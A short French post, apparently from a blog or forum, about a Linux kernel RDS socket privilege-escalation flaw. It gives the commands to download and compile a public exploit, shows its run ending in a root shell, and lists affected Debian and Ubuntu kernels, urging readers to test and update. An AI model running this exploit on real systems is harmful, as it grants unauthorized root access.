Cette faille est donc présente dans les kernels 2.6.30 à 2.6.36-rc8

exemple:

wget www.tux-planet.fr/public/hack/exploits/kernel/linux-rds-exploit.c
gcc -o rds ./linux-rds-exploit.c

et paf !

    $ ./linux-rds-exploit
    [*] Linux kernel >= 2.6.30 RDS socket exploit
    [*] by Dan Rosenberg
    [*] Resolving kernel addresses...
    [+] Resolved rds_proto_ops to 0xf7d2e518
    [+] Resolved rds_ioctl to 0xf7d29000
    [+] Resolved commit_creds to 0xc0450a6f
    [+] Resolved prepare_kernel_cred to 0xc045097a
    [*] Overwriting function pointer...
    [*] Triggering payload...
    [*] Restoring function pointer...
    [*] Got root!

    sh-4.1# id
    uid=0(root) gid=0(root) groups=0(root) 

- sur une debian Lenny à jour, kernel 2.6.26-2, la faille n'est pas présente.
- sur ubuntu 9.10 avec kernel 2.6.31-20: la faille est présente
- sur ubuntu 10.04 avec kernel 2.6.32-24, la faille est présente
- sur ubuntu 10.10 avec kernel 2.6.35-22 la faille n'est pas présente
- sur une debian squeeze avec kernel 2.6.32-5, la faille n'est pas présente

Bref, testez la manipulation ci dessus, et si votre os est faillible, mettez à jour !